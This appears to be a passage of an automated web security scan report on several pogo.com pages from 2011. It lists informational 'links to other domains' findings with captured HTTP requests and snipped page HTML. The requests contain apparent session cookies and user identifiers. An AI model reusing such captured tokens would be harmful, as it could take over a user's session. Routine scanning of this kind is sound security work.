       <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=583577?"></script><noscript><a href="http://ad.doubleclick.net/jump/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=583577?" target="ad"><img src="http://ad.doubleclick.net/ad/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=583577?" width=300 height=250 border=0 alt="Click Here!"></a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=654693457"></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068507910/?label=default&guid=ON&script=0"/>
</div>
...[SNIP]...

16.52. http://www.pogo.com/arcade-sports-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/arcade-sports-games

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/arcade-sports-games?pageSection=categorybar_sportsarcade

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=893248?
http://ad.doubleclick.net/adj/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=893248?
http://ad.doubleclick.net/jump/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=893248?
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/11.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/53.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/55.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/7.png
http://connect.facebook.net/en_US/all.js
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=710583888
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1068507910/?label=PJKMCLbU2AEQhsbA_QM&guid=ON&script=0
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /arcade-sports-games?pageSection=categorybar_sportsarcade HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:58 GMT
Server: Apache-Coyote/1.1
Content-Length: 102179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

   <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
       <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=893248?"></script><noscript><a href="http://ad.doubleclick.net/jump/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=893248?" target="ad"><img src="http://ad.doubleclick.net/ad/sportsarcade.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=893248?" width=300 height=250 border=0 alt="Click Here!"></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww55-forward?site=pogo&pageSection=ag_1list15_img_ww55"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/55.png" alt="Plants vs. Zombies" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww7-forward?site=pogo&pageSection=ag_1list16_img_ww7"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/7.png" alt="Tile City" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww11-forward?site=pogo&pageSection=ag_1list17_img_ww11"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/11.png" alt="Brickout" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww53-forward?site=pogo&pageSection=ag_1list18_img_ww53"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/53.png" alt="TWISTER Bounce Shot" width="80" height="45" /></a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=710583888"></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068507910/?label=PJKMCLbU2AEQhsbA_QM&guid=ON&script=0"/>
</div>
...[SNIP]...

16.53. http://www.pogo.com/board-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/board-games

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/board-games?pageSection=footer_board

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/board.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=271501?
http://ad.doubleclick.net/adj/board.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=271501?
http://ad.doubleclick.net/jump/board.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=271501?
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/31.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/42.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/47.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/48.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/54.png
http://connect.facebook.net/en_US/all.js
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=762309119
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1068507910/?label=7xeQCObO2AEQhsbA_QM&guid=ON&script=0
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:48 GMT
Server: Apache-Coyote/1.1
Content-Length: 106219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

   <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
       <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/board.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=271501?"></script><noscript><a href="http://ad.doubleclick.net/jump/board.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=271501?" target="ad"><img src="http://ad.doubleclick.net/ad/board.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=271501?" width=300 height=250 border=0 alt="Click Here!"></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww54-forward?site=pogo&pageSection=ag_1list16_img_ww54"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/54.png" alt="Family Feud" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww42-forward?site=pogo&pageSection=ag_1list17_img_ww42"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/42.png" alt="The Price Is Right" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww47-forward?site=pogo&pageSection=ag_1list18_img_ww47"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/47.png" alt="MONOPOLY Downtown" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww31-forward?site=pogo&pageSection=ag_1list19_img_ww31"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/31.png" alt="JEOPARDY!" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww48-forward?site=pogo&pageSection=ag_1list20_img_ww48"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/48.png" alt="TRIVIAL PURSUIT TURBO" width="80" height="45" /></a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=762309119"></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068507910/?label=7xeQCObO2AEQhsbA_QM&guid=ON&script=0"/>
</div>
...[SNIP]...

16.54. http://www.pogo.com/club-pogo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/club-pogo

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/club-pogo?site=pogo&pageSection=header_club

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=804119317
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.clubpogo.com/?site=pogo&pageSection=header_club
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/hasbro
http://www.easportsactive.com/
http://www.esrb.org/
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.playfish.com/
http://www.pogoprizerules.com/
http://www.rockband.com/
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /club-pogo?site=pogo&pageSection=header_club HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/prize/prize.do?pageSection=header_prizes
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536537996-New%7C1297128537996%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.hp.ls.cfg=0; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:28:55 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:28:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 27753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
<li><a href="http://www.playfish.com/" id="playfish" target="_blank" onclick="OmnitureCustomLink('au_hdreapl'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/" id="electronicArts" target="_blank" onclick="OmnitureCustomLink('au_hdreaea'); return true;"><span>
...[SNIP]...
<li><a href="http://www.easportsactive.com/" id="eaActive" target="_blank" onclick="OmnitureCustomLink('au_hdreaact'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/hasbro" id="eaHasbro" target="_blank" onclick="OmnitureCustomLink('au_hdreahas'); return true;"><span>
...[SNIP]...
<li><a href="http://www.rockband.com/" id="rockband" target="_blank" onclick="OmnitureCustomLink('au_hdrearock'); return true;"><span>
...[SNIP]...
<li id="tn-club"><a class="navlink" href="http://www.clubpogo.com/?site=pogo&pageSection=header_club" target="_top" id="clubpogo-link"><img src="/vl/img/header/main/en_US/pogo/icon-clubPogo.png" />
...[SNIP]...
<div class="container clearfix">
           <a href="http://www.esrb.org"><img src="/hotdeploy/us/homepage/img/clubpogo-info/esrb.jpg" width="72" height="50" alt="" class="esrb" />
...[SNIP]...
<p style="margin-top:5px;">** NO PURCHASE NECESSARY to win. See <a href="http://www.pogoprizerules.com">www.pogoprizerules.com</a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=804119317"></iframe>
...[SNIP]...

16.55. http://www.pogo.com/games/scrabble previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/games/scrabble

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364?
http://ad.doubleclick.net/ad/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=2;sz=160x600;ord=326364?
http://ad.doubleclick.net/adj/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364?
http://ad.doubleclick.net/adj/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=2;sz=160x600;ord=326364?
http://ad.doubleclick.net/jump/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364?
http://ad.doubleclick.net/jump/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=2;sz=160x600;ord=326364?
http://connect.facebook.net/en_US/all.js
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2099807974
http://www.clubpogo.com/?site=pogo&intcmp=cp_LeftNavfree_about&pageSection=free_home_cp_leftnav
http://www.clubpogo.com/?site=pogo&intcmp=cp_freepogo_roomsel_joincp_text
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.clubpogo.com/?site=pogo&pageSection=header_club
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/hasbro
http://www.easportsactive.com/
http://www.esrb.org/
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
http://www.playfish.com/
http://www.rockband.com/
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:29:48 GMT; Path=/games/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:29:47 GMT
Server: Apache-Coyote/1.1
Content-Length: 59330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
<li><a href="http://www.playfish.com/" id="playfish" target="_blank" onclick="OmnitureCustomLink('au_hdreapl'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/" id="electronicArts" target="_blank" onclick="OmnitureCustomLink('au_hdreaea'); return true;"><span>
...[SNIP]...
<li><a href="http://www.easportsactive.com/" id="eaActive" target="_blank" onclick="OmnitureCustomLink('au_hdreaact'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/hasbro" id="eaHasbro" target="_blank" onclick="OmnitureCustomLink('au_hdreahas'); return true;"><span>
...[SNIP]...
<li><a href="http://www.rockband.com/" id="rockband" target="_blank" onclick="OmnitureCustomLink('au_hdrearock'); return true;"><span>
...[SNIP]...
<li id="tn-club"><a class="navlink" href="http://www.clubpogo.com/?site=pogo&pageSection=header_club" target="_top" id="clubpogo-link"><img src="/vl/img/header/main/en_US/pogo/icon-clubPogo.png" />
...[SNIP]...
<div class="ad-border"><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364?"></script><noscript><a href="http://ad.doubleclick.net/jump/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364?" target="ad"><img src="http://ad.doubleclick.net/ad/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364?" width=728 height=90 border=0 alt="Click Here!"></a>
...[SNIP]...
<noscript>
       <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="150" height="120">
           <param name="movie" value="/hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2.swf" />
...[SNIP]...
<div class="cpsee"><a href="http://www.clubpogo.com/?site=pogo&intcmp=cp_LeftNavfree_about&pageSection=free_home_cp_leftnav">Find out more about <br />
...[SNIP]...
</strong> ( <a href="http://www.clubpogo.com/?site=pogo&intcmp=cp_freepogo_roomsel_joincp_text">Join Club Pogo</a>
...[SNIP]...
<div class="logo-1"><a href="http://www.esrb.org"><img src="/img/misc/esrb/esrb-e.gif" border="0">
...[SNIP]...
